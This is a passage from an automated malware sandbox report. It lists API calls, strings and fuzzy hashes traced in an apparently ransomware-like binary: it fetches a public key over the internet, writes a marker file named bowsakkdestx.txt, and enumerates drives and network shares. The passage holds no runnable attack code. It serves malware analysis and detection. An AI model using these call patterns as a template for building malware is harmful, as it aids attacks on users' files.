                                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                • _strstr.LIBCMT ref: 0041EA36
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                • _malloc.LIBCMT ref: 0041EB86
                                • _memset.LIBCMT ref: 0041EB94
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                • _strstr.LIBCMT ref: 0041EBDA
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                • String ID: bowsakkdestx.txt${"public_key":"
                                • API String ID: 2805819797-1771568745
                                • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                • API String ID: 1302938615-3129329331
                                • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                APIs
                                • ___unDName.LIBCMT ref: 0043071B
                                • _strlen.LIBCMT ref: 0043072E
                                • __lock.LIBCMT ref: 0043074A
                                • _malloc.LIBCMT ref: 0043075C
                                • _malloc.LIBCMT ref: 0043076D
                                • _free.LIBCMT ref: 004307B6
                                  • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                • _free.LIBCMT ref: 004307AF
                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                • String ID:
                                • API String ID: 3704956918-0
                                • Opcode ID: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                • Opcode Fuzzy Hash: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                APIs
                                • timeGetTime.WINMM ref: 00411B1E
                                • timeGetTime.WINMM ref: 00411B29
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                • DispatchMessageW.USER32(?), ref: 00411B5C
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                • Sleep.KERNEL32(00000064), ref: 00411B72
                                • timeGetTime.WINMM ref: 00411B78
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageTimetime$Peek$DispatchSleep
                                • String ID:
                                • API String ID: 3697694649-0
                                • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                APIs
                                • __init_pointers.LIBCMT ref: 00425141
                                  • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                  • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                  • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                • __mtinitlocks.LIBCMT ref: 00425146
                                • __mtterm.LIBCMT ref: 0042514F
                                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                  • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                • __calloc_crt.LIBCMT ref: 00425174
                                • __initptd.LIBCMT ref: 00425196
                                • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                • String ID:
                                • API String ID: 3567560977-0
                                • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                APIs
                                • __lock.LIBCMT ref: 0042594A
                                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                • _free.LIBCMT ref: 00425970
                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                • __lock.LIBCMT ref: 00425989
                                • ___removelocaleref.LIBCMT ref: 00425998
                                • ___freetlocinfo.LIBCMT ref: 004259B1
                                • _free.LIBCMT ref: 004259C4
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                • String ID:
                                • API String ID: 626533743-0
                                • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___from_strstr_to_strchr
                                • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                • API String ID: 601868998-2416195885
                                • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: .\crypto\buffer\buffer.c$g9F
                                • API String ID: 2102423945-3653307630
                                • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                APIs
                                • __getptd_noexit.LIBCMT ref: 004C5D3D
                                  • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                • __calloc_crt.LIBCMT ref: 004C5D60
                                • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                Strings
                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                • API String ID: 3123740607-798102604
                                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _fprintf_memset
                                • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                • API String ID: 3021507156-3399676524
                                • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$AppendFolder
                                • String ID: bowsakkdestx.txt
                                • API String ID: 29327785-2616962270
                                • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                APIs
                                • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$CreateShowUpdate
                                • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                • API String ID: 2944774295-3503800400
                                • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                APIs
                                • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                • _memset.LIBCMT ref: 00410C4C
                                • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$AllocGlobalOpenResource_memset
                                • String ID:
                                • API String ID: 364255426-0
                                • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                APIs
                                • __getenv_helper_nolock.LIBCMT ref: 00441726
                                • _strlen.LIBCMT ref: 00441734
                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                • _strnlen.LIBCMT ref: 004417BF
                                • __lock.LIBCMT ref: 004417D0
                                • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                • String ID:
                                • API String ID: 2168648987-0
                                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                APIs
                                • GetLogicalDrives.KERNEL32 ref: 00410A75
                                • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                • String ID:
                                • API String ID: 2560635915-0
                                • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                APIs
                                • _malloc.LIBCMT ref: 0043B70B
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • _free.LIBCMT ref: 0043B71E
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap_free_malloc
                                • String ID:
                                • API String ID: 1020059152-0
                                • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                APIs
                                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                • DispatchMessageW.USER32(?), ref: 0041F0B6
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                • String ID:
                                • API String ID: 1380987712-0
                                • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                APIs
                                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                • DispatchMessageW.USER32(?), ref: 0041E546
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
